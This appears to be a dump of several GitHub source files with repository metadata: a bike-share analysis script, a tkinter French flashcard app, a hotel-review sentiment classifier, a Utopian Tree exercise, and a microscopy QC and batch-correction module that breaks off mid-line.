data\")\n\noffset = 0\nfor i in range(offset):\n    policy.update_memory(None, states[i], actions[i], rewards[i])\n\nupdate_round = 20\neval_freq = 400\n\nfor i in range(len(feedback) - offset):\n\n    if i % eval_freq == 0 and i != 0:\n        print(\"Evaluating\")\n        evaluate(policy_sys=policy)\n\n    policy.update_memory(None, states[offset + i], actions[offset + i], rewards[offset + i])\n    if i % update_round == 0:\n        print(\"Updating\")\n        for k in range(1):\n            policy.update()\n","repo_name":"ConvLab/ConvLab-3","sub_path":"convlab/policy/train_on_AMT.py","file_name":"train_on_AMT.py","file_ext":"py","file_size_in_byte":5416,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"32"}
+{"seq_id":"7376596786","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Oct 20 00:06:25 2018\r\n\r\n@author: joann\r\n\"\"\"\r\nimport numpy 
as np\r\nimport pandas as pd\r\nfrom scipy import stats\r\nfrom datetime import datetime as dt\r\n#Display or graph 3 metrics or trends from the data set that are interesting to you.\r\n#Which start/stop stations are most popular?\r\n#What is the average distance traveled\r\n#How many riders include bike sharing as a regular part of their commute?\r\n\r\n#3 trends: Duration, plan duration, Passholder\r\n\r\n#Regular user -> monthly user \r\n\r\n#Duration unit: seconds\r\n\r\n#average distance: using latitude and longitude?\r\n\r\n#below is for testing comparing dates\r\n#a = dt.strptime('2016-07-07','%Y-%m-%d')\r\n#b = dt.strptime('2016-07-08', '%Y-%m-%d')\r\n#print(a < b)\r\n\r\ndf = pd.read_csv('metro-bike-share-trip-data.csv')\r\n#check if bike riders have taken rides twice in the same day\r\ncounter = 0\r\ndates = df['Start Time'].str[:10] #the date part of each trip's start timestamp\r\nfor date in dates.unique():\r\n    specificDate = df[dates == date] #all trips that started on this date\r\n    bike_counts = specificDate['Bike ID'].value_counts()\r\n    counter += int((bike_counts > 1).sum()) #bikes ridden more than once that day\r\n\r\n\r\n#print(df['Starting Station ID'].describe())\r\nprint(df['Duration'].describe()) #figure out how to neatly display information\r\n#box plot for the above currently looks very messy\r\nstartStationMode = stats.mode(df['Starting Station ID'])\r\nendStationMode = stats.mode(df['Ending Station ID'])\r\nprint('Most popular start station: ', startStationMode)\r\nprint('Most popular end station: ', endStationMode)\r\n\r\n","repo_name":"joannacao/Bikeshare-data-analysis","sub_path":"bikeshare-data.py","file_name":"bikeshare-data.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"17967487159","text":"BACKGROUND_COLOR = \"#B1DDC6\"\n\nfrom tkinter import *\nimport pandas\nimport random\n\n\ncurrent_card = {}\nto_learn = {}\nwindow = Tk()\nwindow.title(\"FRENCH FLASH\")\n\n\ntry:\n    data = pandas.read_csv(\"data/words_to_learn.csv\")\nexcept FileNotFoundError:\n    original_data = pandas.read_csv(\"data/french_words.csv\")\n    to_learn = original_data.to_dict(orient=\"records\")\nelse:\n    to_learn = data.to_dict(orient=\"records\")\n\ndef french_text():\n    global current_card\n    current_card = random.choice(to_learn)\n    canvas.itemconfig(french_word, text=current_card[\"French\"], fill=\"black\")\n\n\ndef flip_card():\n    canvas.itemconfig(french_title, text=\"English\", fill=\"black\")\n    canvas.itemconfig(french_word, text=current_card[\"English\"], fill=\"black\")\n    canvas.itemconfig(front_img, image=card_back)\n    canvas.itemconfig(back_img, image=card_front)\n\ndef known_word():\n    to_learn.remove(current_card)\n    print(len(to_learn))\n    french_text()\n    data = pandas.DataFrame(to_learn)\n    data.to_csv(\"data/words_to_learn.csv\", index=False) #write back to the same file that is read on startup\n\n\ncanvas = Canvas(width=800, height=526, highlightthickness=0)\nwindow.minsize(width=800, height=525)\nwindow.config(pady=50, padx=50, background=BACKGROUND_COLOR)\ncard_back = PhotoImage(file=\"images/card_back.png\")\nback_img = canvas.create_image(400, 263, image=card_back)\n\ncard_front = PhotoImage(file=\"images/card_front.png\")\nfront_img = canvas.create_image(400, 263, image=card_front)\n\nfrench_title = canvas.create_text(400, 150, text=\"French\", font=(\"Arial\", 40, \"bold\"), fill=\"black\" 
)\n\nfrench_word = canvas.create_text(400, 263, text=\"\", font=(\"Ariel\", 60, \"bold\"), fill=\"black\")\n\n\n\n\n\nfrench_text()\n\n\n\n\n\n\n\n\n\n\n\n\ncanvas.config(background=BACKGROUND_COLOR)\n\ncanvas.grid(column=1, row=1, columnspan=2)\nright_img = PhotoImage(file=\"images/right.png\")\nwrong_img = PhotoImage(file=\"images/wrong.png\")\nright_button = Button(image=right_img, highlightthickness=0, border=0, command=known_word)\n\nright_button.grid(column=2, row=2)\nright_button.config(highlightbackground=\"green\")\n\nwrong_button = Button(image=wrong_img, highlightthickness=0, border=0, command=french_text)\nwrong_button.config(background=BACKGROUND_COLOR)\nwrong_button.grid(column=1, row=2)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nwindow.mainloop()","repo_name":"Mehrshadj3/French_flashcard","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31396045073","text":"from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer, TfidfTransformer\n\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nimport pandas as pd\nimport nltk\n\nimport sklearn.metrics as met\n\nfrom nltk.stem import PorterStemmer\nfrom nltk.stem import LancasterStemmer\nfrom nltk.corpus import stopwords\n\nfrom nltk.tokenize import sent_tokenize, word_tokenize\n\nimport numpy as np\n\nfrom sklearn.svm import SVC\nfrom sklearn.neighbors import KNeighborsClassifier\n\nimport sklearn.preprocessing as prep\n\nporter = PorterStemmer()\nlancaster=LancasterStemmer()\n\ndef stemSentence(sentence):\n token_words=sentence.split(\" \")\n stem_sentence=[]\n for word in token_words:\n stem_sentence.append(porter.stem(word))\n stem_sentence.append(\" \")\n return \"\".join(stem_sentence)\n\n\n# print(porter.stem(sentence))\n\ndf = pd.read_csv('Hotel_Reviews.csv')\n\npositive = df['Positive_Review']\n\nnegative = df['Negative_Review']\n\n\ncorpus = []\n\ncount = 0\n\nfor row in positive :\n\n processed_row = stemSentence(row)\n\n corpus.append(processed_row)\n\n count+= 1\n\n if count == 3000 :\n break\n\ncount = 0\n\nfor row in negative :\n\n processed_row = stemSentence(row)\n\n corpus.append(processed_row)\n\n count+= 1\n\n if count == 3000 :\n break\n\n\nclasses = ['positive' if i < 3000 else 'negative' for i in range(6000)]\n\n\nvectorizer = TfidfVectorizer(stop_words='english')\nx_fitted = vectorizer.fit_transform(corpus)\n\nx_train, x_test, y_train, y_test = train_test_split(x_fitted, classes, stratify = classes, test_size = 0.3)\n\nclf = MultinomialNB()\n\nclf.fit(x_train, y_train)\n\ndf_visualisator = pd.DataFrame(clf.feature_count_, index =clf.classes_, columns = vectorizer.get_feature_names())\n\n\nhotels = df['Hotel_Name'].unique()\n\ncnt = 0\n\nnew_df = []\n\nfor h in hotels :\n\n if cnt == 100 :\n\n break\n\n diff_of_com = 0\n\n tmp_df = df.loc[df['Hotel_Name'] == h]\n\n average_score = tmp_df['Average_Score'].unique()\n\n num_reviews = tmp_df['Total_Number_of_Reviews'].unique()\n # print(tmp_df.head())\n\n for positive in tmp_df['Positive_Review'] :\n\n \n # positive_text = row['Positive_Review']\n\n # print(positive)\n\n x_predict = vectorizer.transform([positive])\n\n y_predict = clf.predict(x_predict)\n\n probabilies = clf.predict_proba(x_predict)\n\n s = pd.Series(probabilies[0], index = clf.classes_)\n\n diff_of_com += s[1] - s[0]\n\n for negative in tmp_df['Negative_Review'] :\n\n 
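# classify the negative review and accumulate P(positive) - P(negative), mirroring the positive loop above\n        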
x_predict = vectorizer.transform([negative])\n\n        y_predict = clf.predict(x_predict)\n\n        probabilies = clf.predict_proba(x_predict)\n\n        s = pd.Series(probabilies[0], index = clf.classes_)\n\n        diff_of_com += s[1] - s[0]\n\n    \n    avg_negative_word_count = np.average(tmp_df['Review_Total_Negative_Word_Counts'])\n    avg_positive_word_count = np.average(tmp_df['Review_Total_Positive_Word_Counts'])\n\n    new_df.append([average_score[0], h, num_reviews[0], avg_positive_word_count, avg_negative_word_count, diff_of_com / num_reviews[0]])\n\n    print('For hotel : {}'.format(h))\n\n    cnt += 1\n    # print (diff_of_com / num_reviews)\n\ndf = pd.DataFrame(new_df, columns = ['Average_Score', 'Hotel_Name', 'Num_Reviews', 'AVG_pos', 'AVG_neg', 'Pos_Negative_Proba'])\n\nlab_enc = prep.LabelEncoder()\n\n# new_df.set_index('Hotel_Name', inplace = True)\n\n# print(new_df.head())\n\ny = df['Average_Score']\n\n# y = lab_enc.fit_transform(y)\n\ny = ['very_bad' if e < 6 else e for e in y]\ny = ['bad' if not isinstance(e, str) and e < 7 else e for e in y]\ny = ['good' if not isinstance(e, str) and e < 8 else e for e in y]\ny = ['very_good' if not isinstance(e, str) and e < 9 else e for e in y]\ny = ['excellent' if not isinstance(e, str) and e < 10 else e for e in y]\n\n# y = np.round(y)\n\nfeatures = df.columns[2:].tolist()\nx=df[features]\n\nprint(x.columns)\n\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)\n\n# print(x_train)\nprint(y_train)\n\n# clf = SVC(C=1.0, kernel='linear')\n# clf.fit(x_train, y_train)\n\n# Parameters for cross-validation\nparameters_for_SVC = [{'C': [pow(2,x) for x in range(-6,10,2)],\n                    'kernel' : ['linear']\n                    },\n\n                    {'C': [pow(2,x) for x in range(-6,10,2)],\n                    'kernel': ['poly'],\n                    'degree': [2, 3, 4, 5],\n                    'gamma': np.arange(0.1, 1.1, 0.1),\n                    'coef0': np.arange(0, 2, 0.5)\n                    },\n\n                    {'C': [pow(2,x) for x in range(-6,10,2)],\n                    'kernel' : ['rbf'],\n                    'gamma': np.arange(0.1, 1.1, 0.1),\n                    },\n\n                    {'C': [pow(2,x) for x in range(-6,10,2)],\n                    'kernel' : ['sigmoid'],\n                    'gamma': np.arange(0.1, 1.1, 0.1),\n                    'coef0': np.arange(0, 2, 0.5)\n                    }]\n\n\nparameters_for_KNN = [\n    {'n_neighbors': [3, 4, 5],\n    'weights' : ['distance', 'uniform'], \n    'p' : [1, 2]\n    }]\n\n\n# Use KNeighborsClassifier instead of SVC here when tuning parameters for kNN\nclf = GridSearchCV(KNeighborsClassifier(), parameters_for_KNN, cv=5, scoring='precision_macro')\nclf.fit(x_train, y_train)\n\n# print(clf.best_params_)\nprint(clf.best_score_)\nprint(clf.best_params_)\n\ny_predicted = clf.predict(x_train)\n\nprint(met.confusion_matrix(y_train, y_predicted))","repo_name":"akinovak/guess_rate","sub_path":"guess_rate.py","file_name":"guess_rate.py","file_ext":"py","file_size_in_byte":5359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43781913452","text":"# The Utopian Tree goes through 2 cycles of growth every year.\n# Each spring, it doubles in height.\n# Each summer, its height increases by 1 meter.\n\n# Laura plants a Utopian Tree sapling with a height of 1 meter at the onset of spring.\n# How tall will her tree be after n growth cycles?\n\n# For example, if the number of growth cycles is n=5, the calculations are as follows:\n\n# Period Height\n# 0 1\n# 1 2\n# 2 3\n# 3 6\n# 4 7\n# 5 14\n# 6 15\n# 7 30\n\n# cycle = [0, 1, 4, 3, 27]\n# answer [1, 2, 7, 6, 32766]\n\n\n\n\ndef _utopian (x):\n    \"\"\"The _utopian function computes the height of the tree in metres after x cycles.\n    To work correctly you must pass a whole number greater than zero.\n\n    1 cycle = 6 months\n\n    
cycle 0: height + 1 m\n    cycle 1: height x 2\n    every further even cycle: height + 1 m\n    every further odd cycle: height x 2\n    \"\"\"\n\n    # check that it is an integer and a positive number (if not, prompt the user for a valid value)\n    if x >=0 and isinstance(x, int):\n        y = 0\n        # the calculation itself\n        while y != x + 1:\n            if y == 0:\n                wynik = 1\n                y = y +1\n            elif x != 0:\n                if y % 2 == 0:\n                    wynik = wynik + 1\n                    y = y +1\n                elif y % 2 == 1:\n                    wynik = wynik * 2\n                    y = y +1\n        # print the result\n        print ('After',x ,'cycles the height of the tree will be: ',wynik, 'm.')\n    else:\n        x = input (\"Enter a positive whole number of cycles\")\n\n\n\n_utopian(9)\n\n\n","repo_name":"zaniuto/homework","sub_path":"Praca domowa 10.06.2019/homework_1.py","file_name":"homework_1.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26221063607","text":"\"\"\" Tools for QC-ing and summarizing the data\n\nFunctions:\n\n* :py:func:`qc_stats_df`: Merge the statistics, QC, and study data frames\n* :py:func:`bin_by_rank`: Bin a population into equally sized bins using the data ranks\n* :py:func:`bin_by_dist`: Bin a population into bins with different kinds of distance spacing\n* :py:func:`calc_bin_edges`: Calculate the edges of bins for :py:func:`bin_by_dist`\n* :py:func:`calc_extended_values`: Calculate additional values from the available values in the dataset\n\n\n\"\"\"\n\n# Imports\nfrom typing import Optional, Union, Dict, List\n\n# 3rd party\nimport numpy as np\n\nimport pandas as pd\nfrom pandas.api.types import is_numeric_dtype\n\nfrom sklearn.neighbors import BallTree\n\n# Functions\n\n\ndef format_section_id(section: Union[str, float]) -> str:\n    \"\"\" Format the section id\n\n    :param int/str section:\n        The section id as a str/float/int\n    :returns:\n        A cleanly formatted section number as a string\n    \"\"\"\n    if isinstance(section, (int, float)):\n        if np.isnan(section):\n            return ''\n        return f's{int(section):02d}'\n    if section.startswith('s'):\n        section = section[1:]\n    if section == '':\n        return ''\n    return f's{int(section):02d}'\n\n\ndef calc_extended_values(stats_df: pd.DataFrame,\n                         image_df: Optional[pd.DataFrame] = None,\n                         norm_method: str = 'div') -> pd.DataFrame:\n    \"\"\" Calculate additional values for the study data\n\n    :param DataFrame stats_df:\n        The stats database for the image\n    :param DataFrame image_df:\n        If not None, the image dataframe to calculate normalized intensity\n    :param str norm_method:\n        How to normalize image intensity values, one of 'sub' or 'div'\n    :returns:\n        A database extended with new values\n    \"\"\"\n    # Calculate additional ratios\n    if 'SurfaceArea' in stats_df and 'Volume' in stats_df:\n        stats_df['SurfaceAreaVolume'] = stats_df['SurfaceArea'] / stats_df['Volume']\n\n    # Calculate percentages\n    if 'Volume' in stats_df and 'ConvexVolume' in stats_df:\n        stats_df['PercentConvex'] = stats_df['Volume'] / stats_df['ConvexVolume'] * 100\n    if 'NumSurfaceVoxels' in stats_df and 'NumVoxels' in stats_df:\n        stats_df['PercentSurface'] = stats_df['NumSurfaceVoxels'] / stats_df['NumVoxels'] * 100\n    if 'NumCoreVoxels' in stats_df and 'NumVoxels' in stats_df:\n        stats_df['PercentCore'] = stats_df['NumCoreVoxels'] / stats_df['NumVoxels'] * 100\n    if 'SkeletonVoxels' in stats_df and 'SkeletonNumBranchpoints' in stats_df:\n        stats_df['PercentBranchVoxels'] = stats_df['SkeletonNumBranchpoints'] / stats_df['SkeletonVoxels'] * 100\n    if 'SkeletonVoxels' in stats_df and 'NumVoxels' in stats_df:\n        
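# skeleton voxels expressed as a percentage of the object's total voxels\n        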
stats_df['PercentSkeleton'] = stats_df['SkeletonVoxels'] / stats_df['NumVoxels'] * 100\n\n # Don't try and run the per-image normalization\n if image_df is None:\n return stats_df\n\n # Make sure we didn't get any weird duplications in the image data\n if 'Dir Prefix' not in image_df.columns:\n image_df['Dir Prefix'] = ''\n if 'Dir Prefix' not in stats_df.columns:\n stats_df['Dir Prefix'] = ''\n\n image_keys = image_df['Dir Prefix'].str.cat(image_df['File Prefix'], sep='-')\n image_dups = image_keys.duplicated()\n\n if np.any(image_dups):\n raise ValueError(f'Got duplicated keys in image data: {image_keys[image_dups]}')\n\n # Merge the image volume values back in\n all_vol_columns = ['Dir Prefix', 'File Prefix']\n all_vol_columns.extend(c for c in image_df.columns\n if c.startswith(('VolumeIntensityMean_', 'VolumeIntensityPct50_')))\n stats_df = stats_df.merge(image_df[all_vol_columns],\n how='left', on=('Dir Prefix', 'File Prefix'),\n validate='many_to_one').copy()\n\n # Create normalized intensity columns\n norm_stats_df = {}\n for column in stats_df.columns:\n if not column.startswith(('Intensity', 'IntensityCore', 'IntensityShell')):\n continue\n if '_Ch=' not in column:\n continue\n if 'NumVoxels' in column:\n continue\n if 'In_Ch=' in column:\n continue\n if f'Norm{column}' in stats_df.columns:\n continue\n\n channel_prefix, channel_num = column.rsplit('_Ch=', 1)\n channel_num = int(channel_num)\n if channel_prefix.endswith(('Min', 'Max', 'Mean', 'Std')) or 'Pct' in channel_prefix:\n vol_column = f'VolumeIntensityMean_Ch={channel_num}'\n else:\n raise KeyError(f'Unknown intensity value column: {column}')\n\n if norm_method.startswith('sub'):\n norm_stats_df[f'Norm{column}'] = stats_df[column] - stats_df[vol_column]\n elif norm_method.startswith('div'):\n norm_stats_df[f'Norm{column}'] = stats_df[column] / (stats_df[vol_column] + 1.0)\n else:\n raise KeyError(f'Unknown intensity normalization method \"{norm_method}\"')\n\n stats_df = pd.concat([stats_df, pd.DataFrame(norm_stats_df)], axis=1)\n\n # Remove the volumetric columns\n for column in all_vol_columns:\n if column in ('Dir Prefix', 'File Prefix'):\n continue\n del stats_df[column]\n return stats_df.copy()\n\n\ndef find_mutual_neighbors(left: np.ndarray, right: np.ndarray,\n dist: Optional[np.ndarray] = None):\n \"\"\" Find mutual nearest neighbors\n\n :param ndarray left:\n The n x k array of neighbors returned by the left ``BallTree.query``\n on the right coordinates\n\n left_tree = BallTree(left_coords)\n left = left_tree.query(right_coords, k=1)\n\n :param ndarray right:\n The m x k array of neighbors returned by the right ``BallTree.query``\n on the left coordinates\n\n right_tree = BallTree(right_coords)\n right = right_tree.query(left_coords, k=1)\n\n :param ndarray dist:\n If not None, the n x k array of distances from left to right\n :returns:\n A p x 2 array of (right, left) pairs that are mutual neighbors\n If ``dist`` is passed, a p x 3 array of (right, left, dist) pairs\n \"\"\"\n if dist is not None:\n assert dist.shape == left.shape\n neighbors = []\n for i, left_inds in enumerate(left):\n for j in left_inds:\n right_inds = right[j, :]\n mask = right_inds == i\n if np.any(mask):\n if dist is None:\n neighbors.append((i, j))\n else:\n neighbors.append((i, j, dist[i, mask][0]))\n if dist is None:\n return np.array(neighbors, dtype=[('right', 'int64'), ('left', 'int64')])\n else:\n return np.array(neighbors, dtype=[('right', 'int64'), ('left', 'int64'), ('dist', 'float64')])\n\n\ndef average_per_cell(delta: 
np.ndarray,\n mnn: np.ndarray,\n left_neighbors: np.ndarray,\n left_dists: np.ndarray,\n right_neighbors: np.ndarray,\n right_dists: np.ndarray,\n sigma: float = 0.1) -> np.ndarray:\n \"\"\" Implement a gaussian smoothed vector per cell\n\n :param ndarray delta:\n The array of differences between neighbors\n :param ndarray mnn:\n The set of right, left, dist triples for mutual nearest neighbors\n :param ndarray left_neighbors:\n For every element in left, these are the knn in right\n :param ndarray left_dists:\n For every element in left, these are the knn distances in right\n :param ndarray right_neighbors:\n For every element in right, these are the knn in left\n :param ndarray right_dists:\n For every element in right, these are the knn distances in left\n :param float sigma:\n The smoothing kernel applied to the gaussian function\n :returns:\n A vector of offsets to apply to every element in right\n \"\"\"\n assert mnn.shape[0] == delta.shape[0]\n assert left_neighbors.shape == left_dists.shape\n assert right_neighbors.shape == right_dists.shape\n\n # These are the same shape as the right array\n delta_sum = np.zeros((left_dists.shape[0], delta.shape[1]), dtype=np.float64)\n delta_count = np.zeros((left_dists.shape[0], ), dtype=np.float64)\n\n left = mnn['left'] # Indexes into the left array, the same shape as right_neighbors\n right = mnn['right'] # Indexes into the right array, the same shape as left_neighbors\n\n for i in range(mnn.shape[0]):\n # right_mask = right == i\n #\n # delta_sum[i, :] += np.mean(delta[right_mask, :], axis=0)\n # delta_count[i] += 1.0\n #\n #\n #\n # print(i, right_mask, left_mask)\n # assert False\n #\n left_ind = left[i]\n right_ind = right[i]\n\n # For a given point in left, here are all the neighbors in right\n inds = right_neighbors[left_ind, :]\n dist = right_dists[left_ind, :]\n\n # Pull out the delta for this neighbor, and the distance\n key_delta = delta[i:i+1, :]\n\n key_ind = np.nonzero(inds == right_ind)\n assert len(key_ind) == 1\n key_ind = key_ind[0]\n\n # Need a real gaussian for scaling\n weight = np.exp(-0.5*(dist - dist[key_ind])**2/sigma**2)/sigma/np.sqrt(2*np.pi)\n weight = weight[:, np.newaxis]\n\n delta_sum[inds, :] += key_delta*weight\n delta_count[inds] += weight[:, 0]\n\n # Take however much weight we got, if it was less than a full sample\n delta_count[delta_count < 1] = 1.0\n return delta_sum / delta_count[:, np.newaxis]\n\n\ndef remove_batch_effect_mnn(labels: np.ndarray,\n values: np.ndarray,\n num_neighbors: int = 5,\n sigma: float = 1.0) -> np.ndarray:\n \"\"\" Remove the batch effect from a set of values\n\n This implements the mutual nearest neighbors correction proposed in\n Haghverdi et al 2018\n\n :param ndarray labels:\n A 1D vector with labels for each batch\n :param values values:\n A 2D matrix with cells on the rows and values on the columns\n :param int num_neighbors:\n How many mutual neighbors to consider in the dataset\n :param float sigma:\n The smoothing kernel applied to the gaussian function (larger is smoother)\n \"\"\"\n levels = list(sorted(np.unique(labels), key=lambda x: np.sum(labels == x), reverse=True))\n if len(levels) < 2:\n return values\n print(f'Got batch levels: {levels}')\n\n # Step 1 - Cosine normalization\n scales = np.linalg.norm(values, axis=1)[:, np.newaxis]\n values = values / scales\n\n # Step 2 - for each batch, find mutual nearest neighbors\n batches = [values[labels == label, :] for label in levels]\n left_batch = batches.pop(0)\n\n # Left batch is the currently integrated dataset\n # 
Right batch is the data to integrate\n while batches:\n left_tree = BallTree(left_batch)\n\n right_batch = batches.pop(0)\n right_tree = BallTree(right_batch)\n\n # Seach for nearest neighbors in each direction\n left_dists, left_neighbors = left_tree.query(right_batch, k=num_neighbors,\n return_distance=True)\n right_dists, right_neighbors = right_tree.query(left_batch, k=num_neighbors,\n return_distance=True)\n\n assert left_dists.shape[0] == right_batch.shape[0]\n assert left_neighbors.shape[0] == right_batch.shape[0]\n\n assert right_dists.shape[0] == left_batch.shape[0]\n assert right_neighbors.shape[0] == left_batch.shape[0]\n\n # Pairs of neighbors are our marker cells\n mnn = find_mutual_neighbors(left_neighbors, right_neighbors,\n dist=left_dists)\n\n # For each marker cell, get the delta vector in expression for each gene\n right_points, left_points = mnn['right'], mnn['left']\n delta = left_batch[left_points, :] - right_batch[right_points, :]\n\n # delta = average_per_cell(delta, mnn, left_neighbors, left_dists,\n # right_neighbors, right_dists,\n # sigma=sigma)\n # assert delta.shape == right_batch.shape\n # print(np.mean(delta, axis=0))\n delta = np.median(delta, axis=0)[np.newaxis, :]\n right_batch = right_batch + delta\n\n # Now the left dataset is the sum of the old left data and the newly corrected right\n left_batch = np.concatenate([left_batch, right_batch], axis=0)\n\n # Now left batch has all the data, but in the wrong order\n final_values = np.zeros_like(left_batch)\n idx = 0\n final_means = None\n for label in levels:\n mask = labels == label\n step = int(np.sum(mask))\n\n label_scale = scales[mask, :]\n label_values = left_batch[idx:idx+step, :]*label_scale\n\n if final_means is None:\n final_means = np.mean(label_values, axis=0)[np.newaxis, :]\n offset = np.zeros_like(final_means)\n else:\n offset = final_means - np.mean(label_values, axis=0)[np.newaxis, :]\n\n # Rescale the data back to real values\n final_values[mask, :] = label_values + offset\n idx += step\n\n return final_values\n\n\ndef remove_batch_effect_means(labels: np.ndarray,\n values: np.ndarray,\n mode: str = 'median') -> np.ndarray:\n \"\"\" Remove the batch effect from the data\n\n This method estimates a per-batch mean/std for each column and then equalizes\n them across samples\n\n :param ndarray labels:\n A 1D vector with labels for each batch\n :param values values:\n A 2D matrix with cells on the rows and values on the columns\n :param str mode:\n One of 'mean' or 'median' - which stat to correct with\n :returns:\n A batch corrected version of values\n \"\"\"\n\n levels = list(sorted(np.unique(labels)))\n if len(levels) < 2:\n return values\n print(f'Got batch levels: {levels}')\n\n values = values.astype(np.float64)\n batch_intercept = []\n batch_scale = []\n batch_size = []\n\n for level in levels:\n mask = labels == level\n batch_values = values[mask, :]\n\n if mode == 'mean':\n batch_intercept.append(np.nanmean(batch_values, axis=0))\n batch_scale.append(np.nanstd(batch_values, axis=0))\n elif mode == 'median':\n p25, p50, p75 = np.nanpercentile(batch_values, [25, 50, 75], axis=0)\n batch_intercept.append(p50)\n batch_scale.append(p75 - p25)\n else:\n raise KeyError(f'Unknown rescaling mode: \"{mode}\"')\n\n batch_size.append(np.sum(mask))\n\n # Make the statistics similar to the size-weighted average over all batches\n target_intercept = np.average(batch_intercept, axis=0, weights=batch_size)\n target_scale = np.average(batch_scale, axis=0, weights=batch_size)\n\n final_values = 
np.zeros_like(values)\n for i, level in enumerate(levels):\n mask = labels == level\n\n intercept = batch_intercept[i]\n scale = batch_scale[i]\n\n # Center, scale then offset again\n batch_values = values[mask, :] - intercept[np.newaxis, :]\n batch_values *= target_scale[np.newaxis, :] / (scale[np.newaxis, :] + 1e-5)\n batch_values += target_intercept[np.newaxis, :]\n\n final_values[mask, :] = batch_values\n return final_values\n\n\ndef drop_na_columns(df: pd.DataFrame) -> pd.DataFrame:\n \"\"\" Drop columns which are all NA\n\n :param DataFrame df:\n The data frame to clean\n :returns:\n A new data frame with all empty/NA columns dropped\n \"\"\"\n keep_columns = []\n drop_columns = []\n for column in df.columns:\n if np.all(df[column].isna()):\n drop_columns.append(column)\n continue\n if np.all(df[column].apply(str).str.upper().str.strip().isin(['NA', 'NAN', ''])):\n drop_columns.append(column)\n continue\n keep_columns.append(column)\n if drop_columns != []:\n print(f'Dropping NA columns: {drop_columns}')\n if len(keep_columns) < 1:\n raise ValueError(f'No columns to keep in df: {df.columns}')\n return df[keep_columns].copy()\n\n\ndef qc_stats_df(stats_df: pd.DataFrame,\n qc_df: Optional[pd.DataFrame] = None,\n study_df: Optional[pd.DataFrame] = None,\n min_size: Optional[int] = -1,\n max_size: Optional[int] = -1,\n size_column: Optional[str] = 'Volume',\n batch_column: str = 'Batch',\n timepoint_column: Optional[str] = None,\n var_column: Optional[str] = None,\n check_animal_ids: bool = False,\n remove_batch_effect: bool = False,\n good_qc_statuses: Optional[List[str]] = None) -> pd.DataFrame:\n \"\"\" QC and filter the stats data frame\n\n :param DataFrame stats_df:\n The dataframe with the actual stats\n :param DataFrame image_df:\n If not None, the overall image stats\n :param DataFrame qc_df:\n If not None, the dataframe with the QC column\n :param DataFrame study_df:\n The dataframe with the study metadata\n :param int min_size:\n If not None, minimum number of voxels in a surface\n :param int max_size:\n If not None, maximum number of voxels in a surface\n :param str size_column:\n Name of the column to use for size (default: 'Volume')\n :param bool check_animal_ids:\n If True, make sure that all Animal IDs survive QC\n :param bool remove_batch_effect:\n If True, remove the batch effect (requires a 'Batch' column)\n :param str batch_column:\n Name of the column to use for batch regression (default: 'Batch')\n :param list[str] good_qc_statuses:\n The list of values in the \"Status\" column that are considered \"good\"\n :returns:\n A cleaned and QC'ed data frame\n \"\"\"\n if good_qc_statuses is None:\n good_qc_statuses = ['ok', 'okay', 'good']\n elif isinstance(good_qc_statuses, str):\n good_qc_statuses = [good_qc_statuses]\n\n # Clean up the Animal ID column\n stats_df = drop_na_columns(stats_df)\n if qc_df is not None:\n qc_df = drop_na_columns(qc_df)\n if study_df is not None:\n study_df = drop_na_columns(study_df)\n\n if 'Animal ID' in stats_df.columns:\n stats_df['Animal ID'] = stats_df['Animal ID'].apply(str).str.upper().str.strip()\n\n name_columns = ['Animal ID', 'Block', 'Section', 'Dir Prefix', 'File Prefix']\n name_columns = [n for n in name_columns if n in stats_df.columns]\n\n # If the block is non-unique or empty, just ignore it\n if 'Block' in name_columns and len(np.unique(stats_df['Block'])) < 2:\n name_columns.remove('Block')\n\n # Check the QC if we have it\n if qc_df is not None:\n if 'Prefix' in qc_df.columns:\n qc_df = qc_df.rename(columns={'Prefix': 'File 
Prefix'})\n if 'Status' not in qc_df.columns:\n raise ValueError(f'QC DataFrame should have a \"Status\" column, got: {qc_df.columns}')\n\n qc_df['Status'] = qc_df['Status'].str.lower().str.strip()\n if 'Animal ID' in qc_df:\n qc_df['Animal ID'] = qc_df['Animal ID'].apply(str).str.upper().str.strip()\n if 'Section' in qc_df:\n qc_df['Section'] = qc_df['Section'].map(format_section_id)\n\n okay_mask = qc_df['Status'].isin(good_qc_statuses)\n num_okay = np.sum(okay_mask)\n num_total = okay_mask.shape[0]\n print(f'Got {num_okay}/{num_total} good tiles ({num_okay/num_total:0.1%})')\n\n if 'Status' in stats_df.columns:\n del stats_df['Status']\n value_columns = ['Status']\n for extra_value_column in ['Animal ID', 'Section', 'Region', 'Batch']:\n if extra_value_column not in stats_df.columns and extra_value_column in qc_df.columns:\n value_columns.append(extra_value_column)\n stats_df = stats_df.merge(qc_df[name_columns + value_columns],\n on=name_columns, how='left')\n\n pre_animal_ids = set(np.unique(stats_df['Animal ID']))\n\n okay_mask = stats_df['Status'].isin(good_qc_statuses)\n stats_df = stats_df[okay_mask]\n\n post_animal_ids = set(np.unique(stats_df['Animal ID']))\n\n if post_animal_ids != pre_animal_ids:\n if check_animal_ids:\n raise ValueError(f'Lost some animal IDs during QC: {pre_animal_ids - post_animal_ids}')\n else:\n print(f'Lost some animal IDs during QC: {pre_animal_ids - post_animal_ids}')\n\n # Merge with the study data if we got some\n if study_df is not None:\n study_name_columns = ['Animal ID', 'Block', 'Section']\n study_df['Animal ID'] = study_df['Animal ID'].apply(str).str.upper().str.strip()\n study_name_columns = [c for c in study_name_columns if c in study_df.columns]\n if 'Section' in study_df:\n study_df['Section'] = study_df['Section'].map(format_section_id)\n stats_df = stats_df.merge(study_df, on=study_name_columns, how='inner')\n\n # Filter out bad segmentations\n if 'Surface' in stats_df.columns:\n num_background = 